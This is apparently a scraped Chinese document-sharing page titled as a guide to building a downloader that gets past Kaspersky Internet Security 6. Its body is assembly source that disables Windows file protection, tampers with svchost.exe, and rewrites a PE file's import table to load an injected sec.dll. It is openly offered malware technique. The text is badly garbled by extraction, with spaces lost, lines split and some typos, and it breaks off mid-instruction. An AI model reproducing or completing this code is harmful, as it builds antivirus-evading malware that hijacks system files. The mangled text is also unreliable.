修改引入表打造穿透KIS6的下载者Word文件下载.docx
《修改引入表打造穿透KIS6的下载者Word文件下载.docx》由会员分享,可在线阅读,更多相关《修改引入表打造穿透KIS6的下载者Word文件下载.docx(17页珍藏版)》请在冰点文库上搜索。
.modelflat,stdcall
optioncasemap:
none
;
>
include
include
windows.inc
kernel32.inc
includelibkernel32.lib
advapi32.inc
includelib
advapi32.lib
数据段
.data
dwWriten
dd0
zero
dllname
db'
sec.dll'
0
funpara
db0,0,'
SecConfig'
PE_Header
IMAGE_NT_HEADERS
<
0>
My_Section
IMAGE_SECTION_HEADER
My_Dll
MAGE_IMPORT_DESCRIPTOR<
My_DllName
IMAGE_IMPORT_BY_NAME
<
.const
Head_Len
equ
sizeofIMAGE_NT_HEADERS+sizeofIMAGE_SECTION_HEADER
宏
CTEXT
MACROy:
VARARG
LOCALsym
CONSTsegment
ifidni<
y>
<
symdb0
else
symdby,0
endif
CONSTends
exitm<
offsetsym>
ENDM
.code
disablewfp.asm
start:
call_Sfcoff
关闭文件保护
callCreateDll
callSetFile
callModimport;
改写PE文件引入表
exit:
invokeExitProcess,NULL
对目标文件进行更名
SetFileproc
localdestpath[255]:
BYTE
localtmppath[255]:
invokeRtlZeroMemory,addrdestpath,255
invokeRtlZeroMemory,addrtmppath,255
invokeGetSystemDirectory,addrdestpath,255
invokeGetSystemDirectory,addrtmppath,255
invokelstrcat,addrdestpath,CTEXT("
\svchost.exe"
)
invokelstrcat,addrtmppath,CTEXT("
\suchost.exe"
invokeMoveFile,addrdestpath,addrtmppath
invokeCopyFile,addrtmppath,addrdestpath,FALSE
ret
SetFileendp
RVA转换成磁盘文件中的偏移
RVAToOffsetPROCusesediesiedxecxpFileMap:
DWORD,RVA:
DWORD
movesi,pFileMap
assumeesi:
ptrIMAGE_DOS_HEADER
addesi,[esi].e_lfanew
ptrIMAGE_NT_HEADERS
movedi,RVA;
edi==RVA
movedx,esi
addedx,sizeofIMAGE_NT_HEADERS
movcx,[esi].FileHeader.NumberOfSections
movzxecx,cx
assumeedx:
ptrIMAGE_SECTION_HEADER
.whileecx>
0;
checkallsections
.ifedi>
=[edx].VirtualAddress
moveax,[edx].VirtualAddress
addeax,[edx].SizeOfRawData
.ifedi<
eax;
Theaddressisinthissection
subedi,eax
moveax,[edx].PointerToRawData
addeax,edi;
eax==fileoffset
ret
.endif
addedx,sizeofIMAGE_SECTION_HEADER
dececx
.endw
nothing
moveax,edi
RVAToOffsetendp
Modimportproc
localszpath[255]:
LOCALhFile:
HANDLE
LOCALdwPE_Header_OffSet:
DWORD
LOCALdwFileReadWritten:
LOCALdwMySectionOffSet:
LOCALdwLastSection_SizeOfRawData:
LOCALdwLastSection_PointerToRawData:
LOCALhMapping:
LOCALpMapping:
LOCALoImport[520]:
LOCALoImportlen
LOCALChrarctics
LOCALdllnamelen:
LOCALfunparalen:
LOCALirva:
invokeRtlZeroMemory,addroImport,520
invokeRtlZeroMemory,addrszpath,255
nvokelstrcat,addrszpath,CTEXT("
test.exe"
打开文件:
invokeCreateFile,addrszpath,GENERIC_READorGENERIC_WRITE,\
FILE_SHARE_READorFILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL
.ifeax==INVALID_HANDLE_VALUE
jmpErr_CreateFile_Exit
.endif
movhFile,eax
创建内存映射文件
invokeCreateFileMapping,hFile,NULL,PAGE_READONLY,0,0,0
.ifeax!
=NULL
movhMapping,eax
invokeMapViewOfFile,hMapping,FILE_MAP_READ,0,0,0
movpMapping,eax
****************************************
读取PE文件头
invokeSetFilePointer,hFile,3ch,0,FILE_BEGIN
invokeReadFile,hFile,addrdwPE_Header_OffSet,4,addrdwFileReadWritten,NULL
invokeSetFilePointer,hFile,dwPE_Header_OffSet,0,FILE_BEGIN
invokeReadFile,hFile,addrPE_Header,Head_Len,addrdwFileReadWritten,NULL
PE文件有效性检查
.if[PE_Header.Signature]!
=IMAGE_NT_SIGNATURE
jmpExit
判断是否有足够空间存储新节:
movzxeax,[PE_Header.FileHeader.NumberOfSections]
得到添加新节前有多少个节:
movecx,28h
28h=sizeofIMAGE_SECTION_HEADER
mulecx
;
eax=NumberOfSections*sizeofIMAGE_SECTION_HEADER
addeax,dwPE_Header_OffSet
eax=eax+PE文件头偏移
addeax,18h
18h=sizeofIMAGE_FILE_HEADER
movzxecx,[PE_Header.FileHeader.SizeOfOptionalHeader]
addeax,ecx
eax=eax+sizeofIMAGE_OPTIONAL_HEADER
addeax,28h
添加一个新节的大小
.ifeax>
[PE_Header.OptionalHeader.SizeOfHeaders]
**************************************************
计算新节的偏移地址:
movzxeax,[PE_Header.FileHeader.NumberOfSections]
movecx,28h
addeax,4h
4h=sizeof"
PE\0\0"
addeax,dwPE_Header_OffSet
addeax,sizeofIMAGE_FILE_HEADER
addeax,sizeofIMAGE_OPTIONAL_HEADER
movdwMySectionOffSet,eax
现在得到了我们的新节的偏移地址
push[PE_Header.OptionalHeader.SizeOfImage]
pop[My_Section.VirtualAddress]
重构引入表,在文件的最后写入我们的新节:
读取原始引入表数据,读取正确的不带0的引入表
movedi,[PE_Header.OptionalHeader.DataDirectory[sizeofIMAGE_DATA_DIRECTORY].VirtualAddress]
invokeRVAToOffset,pMapping,edi
movedi,eax
invokeSetFilePointer,hFile,edi,0,FILE_BEGIN
不读空的结束符
movoImportlen,0
leaedi,oImport
calclen:
invokeReadFile,hFile,edi,4,addrdwFileReadWritten,NULL
movebx,[edi]
testebx,ebx
jzcalcover
addedi,4
addoImportlen,4
jmpcalclen
calcover:
写入dll名称,定位到最后一节的rawoffset处
moveax,dwMySectionOffSet
subeax,18h
invokeSetFilePointer,hFile,eax,0,FILE_BEGIN
invokeReadFile,hFile,addrdwLastSection_SizeOfRawData,4,addrdwFileReadWritten,NULL
invokeReadFile,hFile,addrdwLastSection_PointerToRawData,4,addrdwFileReadWritten,NULL
movebx,dwLastSection_SizeOfRawData
addebx,dwLastSection_PointerToRawData
invokeSetFilePointer,hFile,ebx,0,FILE_BEGIN
push0
leaeax,dwFileReadWritten
pusheax
moveax,sizeofdllname
movdllnamelen,eax
pusheax;
[My_Section.SizeOfRawData]
leaeax,dllname
pushhFile
callWriteFile
写入IMAGE_THUNK_DATA
pusheax
moveax,sizeoffunpara
addeax,sizeoffunpara
movfunparalen,eax
leaeax,funpara
写入IMAGE_THUNK_DATA的RVA
moveax,[My_Section.VirtualAddress]
addeax,dllnamelen
movirva,eax
invokeWriteFile,hFile,addrirva,4,addrdwFileReadWritten,NULL
写入一个空IMAGE_THUNK_DATA的RVA作为结尾
invokeWriteFile,hFile,addrzero,4,addrdwFileReadWritten,NULL
写入原引入表数据
movecx,oImportlen
invokeWriteFile,hFile,addroImport,ecx,addrdwFileReadWritten,NULL
构造新引入的DLL的IMAGE_IMPORT_DESCRIPTOR
addeax,funparalen
mov[My_Dll.OriginalFirstThunk],eax
mov[My_Dll.TimeDateStamp],0FFFFFFFFh
mov[My_Dll.ForwarderChain],0FFFFFFFFh
movebx,[My_Section.VirtualAddress]
mov[My_Dll.Name1],ebx
mov[My_Dll.FirstThunk],eax
写入新引入的DLL的IMAGE_IMPORT_DESCRIPTOR
invokeWriteFile,hFile,addrMy_Dll,20,addrdwFileReadWritten,NULL
写入以0结尾的空IMAGE_IMPORT_DESCRIPTOR
push20
popecx
fillzero:
pushecx
invokeWriteFile,hFile,addrzero,1,addrdwFileReadWritten,NULL
dececx
testecx,ecx
jnzfillzero
填充我们自己的节的信息:
movdwordptr[My_Section.Name1],"
ler."
movdwordptr[My_Section.Name1]+4,"
co"
mov[My_Section.Misc.VirtualSize],1000h
moveax,[My_Section.Misc.VirtualSize]
moveax,dl